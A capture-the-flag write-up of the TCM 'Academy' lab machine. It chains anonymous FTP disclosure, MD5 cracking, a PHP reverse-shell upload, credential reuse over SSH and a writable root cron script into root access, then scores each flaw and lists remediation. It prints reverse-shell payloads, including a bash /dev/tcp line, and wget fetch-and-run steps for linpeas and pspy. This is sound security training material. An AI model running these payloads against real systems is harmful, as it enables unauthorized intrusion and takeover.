Platform: TCM
Machine: Academy
Difficulty: Easy
Objective: Gain root access and capture the flag.
- Overview
- Methodology
- Reconnaissance
- Enumeration
- Initial Exploitation
- Privilege Escalation
- Flag Capture
- Vulnerability Assessment
- Key Takeaways & Lessons Learned
- Pentester's Final Observation
The Academy machine demonstrates how several seemingly minor security weaknesses can be chained together to achieve complete system compromise.
The attack path involved:
- Information disclosure through FTP.
- Weak password storage using MD5.
- Unrestricted file upload resulting in Remote Code Execution.
- Credential reuse.
- Insecure cron execution leading to root compromise.
Reconnaissance
↓
Enumeration
↓
Credential Discovery
↓
File Upload → RCE
↓
Local Enumeration
↓
Credential Reuse
↓
Cron Abuse
↓
Root Access
netdiscover -r 192.168.126.0/24or
nmap -sn 192.168.126.0/24nmap -sS -p- -A 192.168.126.131- Port 80 (HTTP)
- Academy web application
The first objective is to understand the exposed attack surface. A single web application can often provide enough opportunities to fully compromise a system.
http://192.168.126.131
Shows the default Apache webpage, meaning there was no redirect to the index.html or landing page. This can be flagged as Information Disclosure and be added to findings as it reveals the server information and version that is in use.
gobuster dir \
-u http://192.168.126.131 \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txtWe find that,
http://192.168.126.131/academy
Leads to a login page,
Interesting directories revealed an FTP resource, "note.txt".
We get access to the ftp using: username: anonymous password: anonymous
After retrieving the note.txt through ftp. We make interesting discoveries.
Discovered credentials:
Username: 10201321
Password: cd73502828457d15655bbd7a63fb0bc8
We try to login The password resembles very similar to a hash, so we run it through a hash-identifier.
After identifying it is MD5, we use Hashcat to crack the hash and find that the value is:
student
Leading to the Final credentials:
Username: 10201321
Password: student
Whenever credentials resemble hashes, always attempt identification and cracking before assuming they are plaintext.
Username: 10201321
Password: student
First we try with the hash as the password (maybe it might work!)

It gave us an error as invalid.
Next we try the cracked-hash 'student' as the password.
And it worked smoothly.
We see that the "My Profile" has a file upload functionality.

The profile page:
/my_profile.php
suggests that the server is running PHP and allows image uploads.
File upload functionality is one of the highest-value attack vectors during web application testing because weak validation can quickly lead to Remote Code Execution.
Use:
https://github.com/pentestmonkey/php-reverse-shell
Modify:
$ip = 'ATTACKER-IP';
$port = 1234;Listener:
nc -lvnp 1234Upload:
photo.php
And it uploaded successfully.
hostname
whoamiOutputs:
academy
www-data
Initial access is only the beginning. The next objective is always privilege escalation.
From the reverse shell, we see that we cannot use
sudo suto escalate to root user.
Which leads to our next step, escalating our privileges.
So we use a shell script called LinPEAS, which is available in /opt/linpeas/ We copy the linpeas.sh to /home/kali/Academy And start our own http server using python3 in /home/kali/Academy directory.
python3 -m http.server 8000Now we download the linepeas.sh file into the victim machine using wget. Change the permissions. And execute the linpeas.sh
wget http://192.168.126.128:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.shAnd now we wait for the magic to happen,
We find a lot of interesting information that can help in escalating our privilege.
Lots of passwd files, mysql_passwords, users. We open the /var/www/html/academy/includes/config.php file and check what information we can find in that specific file.
We discovered:
$mysql_user = "grimmie";
$mysql_password = "My_V3ryS3cur3_P4ss";
$mysql_database = "onlinecourse";Configuration files often contain credentials and should always be inspected after gaining shell access.
The information we found, can be very useful to escalate our privilege and now remotely access the server and try if the mysql password we found is reused, and if it is, it works in our favour.
ssh grimmie@192.168.126.131Fantastic! We got access to their server as an administrator only because the user kept the same credentials. That should teach them a lesson.
Credential reuse is one of the most common real-world weaknesses and frequently enables privilege escalation.
We check for what files are there in the home directory using "ls" for grimmie and we find a very interesting piece of file.
A file named:
backup.sh
was found in the user's home directory.
When we check the backup.sh file, it looks like a file running a script to backup the server - by which we can infer that the file is scheduled to be executed by the system - meaning cron jobs are involved.
When we list grimmie's crontab, we see that nothing is listed. Which most probably can mean that the cron is run by another user, which maybe the root user.
To confirm, we use pspy to check if "backup.sh" is really scheduled or not.
PSPY : https://github.com/dominicbreuker/pspy
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.
So we download pspy from github in our attacker machine and copy it into the http server folder we were running. And we use wget to transfer the file to the victim machine.
Using pspy confirmed that the script was executed by root.
Writable scripts executed by root are excellent privilege escalation opportunities.
Confirming that backup.sh is indeed being scheduled to run by cron and not by "grimmie" user. Means it probably is scheduled by root and we can use this information to exploit and get root access.
So we change the script in backup.sh to run the following command and listen in port 8081 using netcat. This is a reverse-shell script which connects to our attacker machine in port 8081.
bash -i >& /dev/tcp/192.168.126.128/8081 0>&1Start listener:
nc -nvlp 8081The machine connects back as root.
whoami
cat /root/flag.txtOutput:
root
- Severity: High
- CVSS v3.1: 7.5
Unauthorized access to application credentials.
- Remove sensitive files from public locations.
- Disable anonymous FTP.
- Restrict access using ACLs.
Priority: P2
- Severity: High
- CVSS v3.1: 7.5
- CWE-327
- CWE-759
- Use Argon2id, bcrypt, or scrypt.
- Implement salting.
- Enforce strong password policies.
Priority: P2
- Severity: Critical
- CVSS v3.1: 9.8
- CWE-434
- Validate file signatures and MIME types.
- Store uploads outside the web root.
- Disable script execution in upload directories.
- Implement allowlists.
Priority: P1
- Severity: High
- CVSS v3.1: 8.8
- CWE-798
- Separate application and system credentials.
- Rotate passwords.
- Use secrets management.
Priority: P1
- Severity: Medium
- CVSS v3.1: 6.5
- CWE-256
- Store secrets in environment variables.
- Restrict file permissions.
- Use secret management solutions.
Priority: P3
- Severity: Critical
- CVSS v3.1: 9.8
- CWE-732
chown root:root backup.sh
chmod 700 backup.sh- Audit cron jobs regularly.
- Monitor integrity of privileged scripts.
Priority: P1
| Vulnerability | Severity | Priority |
|---|---|---|
| Unrestricted File Upload | Critical | P1 |
| Insecure Cron Permissions | Critical | P1 |
| Credential Reuse | High | P1 |
| Information Disclosure | High | P2 |
| Weak Password Storage | High | P2 |
| Plaintext Credentials | Medium | P3 |
- Information disclosure can lead to complete compromise.
- File upload functionality should always be tested.
- Configuration files frequently expose credentials.
- Credential reuse remains highly dangerous.
- Process monitoring tools like pspy are invaluable.
- Enforce secure password storage.
- Validate file uploads.
- Separate credentials.
- Secure cron jobs.
- Implement least privilege.
The Academy machine perfectly demonstrates the concept of vulnerability chaining.
No single vulnerability directly resulted in root compromise. Instead, several weaknesses combined to create a complete attack path:
Information Disclosure
↓
Weak Password Storage
↓
Remote Code Execution
↓
Credential Reuse
↓
Insecure Cron Permissions
↓
Root Compromise
Security failures rarely occur because of a single vulnerability. They occur when several weaknesses coexist and amplify one another.
The key question throughout this engagement was:
"What does this new piece of information allow me to do next?"




























